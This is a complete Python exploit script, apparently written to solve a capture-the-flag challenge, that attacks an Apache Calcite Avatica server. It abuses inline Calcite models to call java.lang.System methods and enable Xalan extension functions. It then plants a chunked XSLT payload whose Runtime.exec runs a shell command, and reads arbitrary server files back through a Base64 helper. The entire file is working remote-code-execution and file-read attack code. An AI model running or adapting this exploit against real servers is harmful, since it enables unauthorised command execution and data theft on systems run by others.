#!/usr/bin/env python3
import base64
import json
import random
import string
import sys
import time

import requests


def die(msg):
    print(f"[-] {msg}", file=sys.stderr)
    sys.exit(1)


def enc(obj):
    s = json.dumps(obj, separators=(",", ":"))
    if len(s.encode()) > 280:
        die(f"request too long: {len(s.encode())} bytes: {s}")
    return s


class Avatica:
    def __init__(self, base_url):
        self.url = base_url.rstrip("/") + "/"
        self.session = requests.Session()

    def post(self, obj, quiet=False):
        data = enc(obj)
        r = self.session.post(self.url, data=data, headers={"Content-Type": "application/json"}, timeout=10)
        if not quiet:
            print(f"[>] {len(data):3d} {data}")
            print(f"[<] {r.status_code} {r.text[:220].replace(chr(10), ' ')}")
        try:
            return r.json()
        except Exception:
            die(f"non-json response {r.status_code}: {r.text[:500]}")

    def open_calcite(self, cid, model):
        return self.post({
            "request": "openConnection",
            "connectionId": cid,
            "info": {"jdbcUrl": "jdbc:calcite:model=inline:" + model},
        })

    def stmt(self, cid):
        j = self.post({"request": "createStatement", "connectionId": cid})
        if "statementId" not in j:
            die(f"createStatement failed: {j}")
        return j["statementId"]

    def q(self, sid, sql, quiet=False):
        return self.post({
            "request": "prepareAndExecute",
            "statementId": sid,
            "sql": sql,
            "maxRowsInFirstFrame": 1,
        }, quiet=quiet)


def sql_string(s: str) -> str:
    return "'" + s.replace("'", "''") + "'"


def rand_cid(prefix):
    return prefix + random.choice(string.ascii_letters)


def main():
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} http://host:port/ [outfile]", file=sys.stderr)
        sys.exit(1)

    target = sys.argv[1]
    out_file = sys.argv[2] if len(sys.argv) > 2 else "/tmp/o"
    a = Avatica(target)

    # 1) Enable Xalan Java extension functions and store XSLT in System properties.
    cid = rand_cid("s")
    sys_model = 'version: 1\nschemas: [{name: s,functions: [{className: java.lang.System,methodName: "*"}]}]'
    a.open_calcite(cid, sys_model)
    sid = a.stmt(cid)
    a.q(sid, "select s.setProperty('jdk.xml.enableExtensionFunctions','true')")

    cmd = f"sh -c /readflag>{out_file}"
    xslt = (
        '<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" '
        'xmlns:r="xalan://java.lang.Runtime" version="1">'
        '<template match="/"><value-of select="r:exec(r:getRuntime(),\''
        + cmd +
        '\')"/></template></stylesheet>'
    )
    chunks = [xslt[i:i + 150] for i in range(0, len(xslt), 150)]
    for i, chunk in enumerate(chunks):
        key = chr(ord('a') + i)
        a.q(sid, f"select s.setProperty('{key}',{sql_string(chunk)})")

    # 2) Trigger XmlFunctions.xmlTransform; the XSLT calls Runtime.exec("sh -c /readflag>/tmp/o").
    cid = rand_cid("x")
    xml_model = (
        'version: 1\nschemas: [{name: s,functions: ['
        '{className: java.lang.System,methodName: "*"},'
        '{className: org.apache.calcite.runtime.XmlFunctions,methodName: xmlTransform}]}]'
    )
    a.open_calcite(cid, xml_model)
    sid = a.stmt(cid)
    expr = "||".join(f"s.getProperty('{chr(ord('a') + i)}')" for i in range(len(chunks)))
    a.q(sid, f"select s.xmlTransform('<a/>',{expr})")

    # 3) Read the redirected flag file through Avatica Base64 helper.
    cid = rand_cid("b")
    b64_model = 'version: 1\nschemas: [{name: s,functions: [{className: org.apache.calcite.avatica.util.Base64,methodName: "*"}]}]'
    a.open_calcite(cid, b64_model)
    sid = a.stmt(cid)

    last = None
    for _ in range(10):
        time.sleep(0.3)
        j = a.q(sid, f"select s.encodeFromFile('{out_file}')", quiet=True)
        last = j
        try:
            rows = j["results"][0]["firstFrame"]["rows"]
            if rows and rows[0] and rows[0][0]:
                flag = base64.b64decode(rows[0][0]).decode(errors="replace")
                print("\n[+] FLAG / output:")
                print(flag)
                return
        except Exception:
            pass
    die(f"could not read output file; last response: {last}")


if __name__ == "__main__":
    main()
